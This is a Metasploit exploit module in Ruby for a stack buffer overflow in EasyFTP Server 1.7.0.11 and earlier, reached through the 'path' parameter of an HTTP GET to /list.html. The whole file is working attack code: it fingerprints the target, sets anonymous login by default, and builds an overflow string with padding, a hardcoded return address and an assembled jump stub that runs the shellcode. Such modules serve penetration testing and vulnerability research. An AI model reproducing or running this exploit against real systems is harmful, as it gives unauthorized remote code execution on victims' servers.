require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow',
'Description'=> %q{
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11
and earlier. EasyFTP fails to check input size when parsing the 'path' parameter
supplied to an HTTP GET request, which leads to a stack based buffer overflow.
EasyFTP allows anonymous access by default; valid credentials are typically
unnecessary to exploit this vulnerability.
After version 1.7.0.12, this package was renamed "UplusFtp".
Due to limited space, as well as difficulties using an egghunter, the use of
staged, ORD, and/or shell payloads is recommended.
},
'Author' =>
[
'ThE g0bL!N',
'jduck'
],
'Version'=> '$Revision: 10024 $',
'References' =>
[
[ 'OSVDB', '66614'],
[ 'URL', 'http://www.exploit-db.com/exploits/11500/' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Privileged' => true,
'Payload'=>
{
'Space'=> 256,
'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2b\x2f\x3b\x3f\x5c",
'Compat' =>
{
'ConnectionType' => '+ws2ord',
},
},
'Platform' => 'win',
'Targets'=>
[
[ 'Windows XP SP3 - Easy FTP Server Universal',
{
'Ret'=> 0x7cc5d507
}
]
],
'DefaultTarget'=> 0,
'DisclosureDate' => 'Feb 18 2010'
))
register_options(
[
Opt::RPORT(8080),
OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),
OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']),
], self.class)
end
def check
info = http_fingerprint
if info and (info =~ /Easy-Web Server\//)
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
if (payload.encoded.length > payload_space)
raise RuntimeError, "Insufficient space for payload, try using a staged, ORD and/or shell payload."
end
stub_asm = %q{
mov edi, esp
add esp, 0xfffffc04
add edi, 0xfffffee8
jmp edi
}
stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string
path = ''
path << payload.encoded
path << rand_text(268 - path.length)
path << [target.ret].pack('V')
path << rand_text(280 - path.length)
path << stub
path << rand_text(332 - path.length)
uri = "/list.html?path="
uri << path
print_status("Trying target #{target.name}...")
res = send_request_raw({ 'uri' => uri }, 5)
if (res)
print_error("The server unexpectedly responded, this is not good.")
print_status(res.inspect)
end
handler
end
end